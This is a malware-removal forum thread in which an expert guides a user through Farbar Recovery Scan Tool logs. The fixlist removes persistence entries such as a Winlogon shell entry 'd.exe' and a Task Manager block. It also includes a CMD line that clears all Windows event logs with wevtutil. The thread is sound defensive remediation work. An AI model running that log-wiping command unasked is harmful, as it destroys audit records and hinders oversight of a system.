FirewallRules: [UDP Query User{DCFA2E94-61CF-4517-A82F-AA51C00BB916}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [{9B9900F7-F341-4F67-A222-BA5ADB3D415F}] => (Block) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WShelper.exe No File
FirewallRules: [{C27B1110-1C16-4970-BA34-D7815EC04CD1}] => (Allow) c:\program files (x86)\opera\63.0.3368.107\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{5F4157A8-99BC-42D7-9E0B-83BC577FB74E}] => (Allow) c:\program files (x86)\opera\64.0.3417.92\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{E312F188-3203-4E00-8BD8-6B9B54F77B8A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 
==================== Restore Points =========================
 
16-11-2019 17:22:21 Removed Betternet for Windows 5.3.0.433
18-11-2019 19:29:54 Removed Nero 8. Available with Windows Installer version 1.2 and later.
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
 
System errors:
=============
Error: (11/19/2019 01:51:48 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/19/2019 01:45:26 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Freemake Improver service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/19/2019 01:45:26 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Freemake Improver service to connect.
 
 
CodeIntegrity:
===================================
 
Date: 2019-11-19 01:49:05.098
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
==================== Memory info =========================== 
 
BIOS: FUJITSU // Phoenix Technologies Ltd. Version 1.08 10/02/2012
Motherboard: FUJITSU FJNBB29
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 91%
Total physical RAM: 3447.63 MB
Available physical RAM: 282.29 MB
Total Virtual: 6893.39 MB
Available Virtual: 2743.88 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:97.56 GB) (Free:38.73 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:368.1 GB) (Free:205.66 GB) NTFS
 
\\?\Volume{da4eedc3-7be1-11e2-8ac3-806e6f6e6963}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: EB90EB90)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=368.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt =======================


#9
RKinner


    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

One more fixlist:

 

Attached File: fixlist.txt (4.08KB)

 

See if you can get Avast to come up. If it does, try to schedule a boot-time scan:

 

Click on Protection, then on Antivirus, then on Other Scans, then on Boot-time Scan. Click on Install Special Definitions. Click on Run on Next PC Reboot.

Reboot and let it run a scan. It may take hours.
Once it finishes, it should load Windows. Mute your speakers so it doesn't wake you up when Windows boots.

When you reboot you will see the scan start. It will tell you where it saves its log. Usually it's C:\ProgramData\AVAST Software\Avast\report\aswBoot.txt, but it might change, so verify the location. This is a hidden location, so you will need to tell Windows to let you see it:

http://www.howtogeek...-windows-vista/

Copy and paste the text from the log to a Reply when done.

 



#10
vladana_91


    Member

  • Topic Starter
  • Member
  • PipPip
  • 18 posts

Done the fixlist but still can't get Avast to start...




#11
RKinner


    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

Can I see a new FRST scan?



#12
vladana_91


    Member

  • Topic Starter
  • Member
  • PipPip
  • 18 posts

Scans are below (sorry for bothering you so much)...

 

Copy of Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (19-11-2019 14:43:11) Run:5
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
HKLM\...\Winlogon: [Shell] explorer.exe,d.exe
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Policies\system: [DisableTaskMgr] 1
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\MountPoints2: {da4eedc7-7be1-11e2-8ac3-806e6f6e6963} - E:\start.exe
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat [2019-11-16] () [File not signed]
Task: {99C2A032-6D1C-441F-87FE-DA0735A1B827} - System32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe" -c -bootremove -uninst:RelevantKnowledge
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{86508D42-E5D7-4D10-9C6F-D427AEEB85B5}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A804CF1A-91E5-4F0C-9E8C-DB39E74056DD}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
MSCONFIG\startupfolder: C:^Users^Vladana^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^ZenMate.bat => C:\Windows\pss\ZenMate.bat.Startup
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe [240512 2019-10-25] (Mixbyte Inc -> )
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
Reboot:
 
 
*****************
 
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value restored successfully
"HKU\S-1-5-21-7682389-3612777877-391866582-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\DisableTaskMgr" => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{da4eedc7-7be1-11e2-8ac3-806e6f6e6963} => removed successfully
C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{99C2A032-6D1C-441F-87FE-DA0735A1B827}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{99C2A032-6D1C-441F-87FE-DA0735A1B827}" => removed successfully
C:\Windows\System32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6243CAD4-3DB1-45D4-933D-254A23B4CA85}" => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{86508D42-E5D7-4D10-9C6F-D427AEEB85B5} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A804CF1A-91E5-4F0C-9E8C-DB39E74056DD} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4} => removed successfully
HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Vladana^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^ZenMate.bat => removed successfully
C:\Windows\pss\ZenMate.bat.Startup => moved successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ProductUpdater" => removed successfully
 
========= FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" =========
 
 
========= End of CMD: =========
 
 
 
The system needed a reboot.
 
==== End of Fixlog 14:43:28 ====
 
 
Copy of FRST.txt:
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-11-2019
Ran by Vladana (administrator) on VLADANA-PC (FUJITSU LIFEBOOK AH512) (19-11-2019 15:28:30)
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Platform: Windows 7 Ultimate (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Hidfind.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Google Inc -> Google Inc.) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation-Mobile Wireless Group -> Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel® Upgrade Service -> Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(iSkySoft) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Opera Software AS -> Opera Software) C:\Program Files (x86)\Opera\launcher.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Popcorn Time) [File not signed] C:\Program Files (x86)\Popcorn Time\Updater.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(WONBO TECHNOLOGY Co.,LIMITED -> ) C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [589176 2011-12-20] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [11406608 2011-12-19] (Intel Corporation - Mobile Wireless Group -> Intel Corporation)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [169368 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [268680 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [1058512 2018-12-18] (DivX, LLC. -> DivX, LLC)
HKLM-x32\...\Run: [NSU_agent] => C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe [190768 2012-02-28] (Nokia -> )
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [KeepVidProUpdateHelper.exe] => C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe [33912 2017-08-15] (WONBO TECHNOLOGY Co.,LIMITED -> )
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2066432 2014-10-31] (iSkySoft) [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [644552 2019-07-04] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [NBKeyScan] => "C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [Google Update] => C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\GoogleUpdateCore.exe [218920 2019-11-05] (Google Inc -> Google LLC)
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => "C:\Program Files (x86)\Common Files\Nero\Lib\NMBgMonitor.exe"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\RunOnce: [Uninstall C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\78.0.3904.97\Installer\chrmstp.exe [2019-11-08] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2016-07-06]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
GroupPolicy: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {100579BF-7099-45D9-81DA-9283171425EF} - System32\Tasks\Opera scheduled Autoupdate 1433936833 => c:\program files (x86)\opera\launcher.exe [1534488 2019-11-05] (Opera Software AS -> Opera Software)
Task: {1BA80324-DEDD-4A84-B6B2-CA83338FEFC4} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {250DFF6E-ACA0-469C-AE95-348B168F5625} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_Plugin.exe [1457720 2019-11-13] (Adobe Inc. -> Adobe)
Task: {31E39139-7D23-449D-BCED-F7C976E90C09} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {3647BA06-A942-4A3A-A231-81D956C0A720} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {3CDCC095-85A8-4F47-A3FD-E5901E10F3FF} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [369752 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {417C02B1-A8B8-4232-9ECA-7B637FC59D88} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {44030493-B508-4C9F-AC24-87A95DD4F70E} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {566F62E7-1E7A-4160-9E8D-8AD1BF772E07} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {64B1DDAF-9698-4A74-994F-0A07F4D7B428} - System32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\Desktop\avast_secureline_setup.exe -d C:\Users\Vladana\Desktop
Task: {7795D282-1AC8-4061-8740-20E3A1600B28} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3933576 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {7EF6B035-B47A-4A54-AC7B-879BC80BDD17} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {82855C30-C4B7-4A15-8981-4489BC782605} - System32\Tasks\DivXUpdate => C:\Program Files (x86)\Common Files\DivX Shared\DivX Update\DivXUpdate.exe [68568 2017-08-02] (DivX, LLC -> DivX, LLC)
Task: {88983266-6574-4D42-9429-D9F16127D4A3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-11-13] (Adobe Inc. -> Adobe)
Task: {8D71D9D7-DCCC-4240-BD4F-C4CA801119C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {9E09A37F-ED36-420C-A03C-DE3C2082D6BE} - System32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Car Thief 6 Full\Uninstall.exe" -c "C:\Program Files (x86)\Car Thief 6 Full\install.log"
Task: {A13BDE9B-63C9-405F-A251-35FF14182E3A} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1873288 2019-09-18] (AVAST Software s.r.o. -> AVAST Software)
Task: {B7E6DE52-C933-4EC4-805D-975375A0B866} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {C3E6B74D-A015-41CB-880A-351C9A99C7A1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {CFBA6569-6A55-4FC1-A592-F5F587B9D002} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_pepper.exe [1453112 2019-11-13] (Adobe Inc. -> Adobe)
Task: {D3B04CF0-75EA-4648-ACB9-9595936714D9} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [560192 2014-10-29] (RealNetworks, Inc. -> )
Task: {F41616F1-BAE7-4545-B894-B26DB5462DA7} - System32\Tasks\SafeZone scheduled Autoupdate 1458718670 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {F99782F5-00F3-46F3-B278-C98C01F39A08} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0C2497A5-01F6-4BCC-9CA4-707802C9870D}: [DhcpNameServer] 10.0.0.1
Tcpip\..\Interfaces\{935B787B-988D-48CA-B7C2-9CD4F281E961}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{E0977D5E-E20A-454E-B20E-ED97A614D189}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
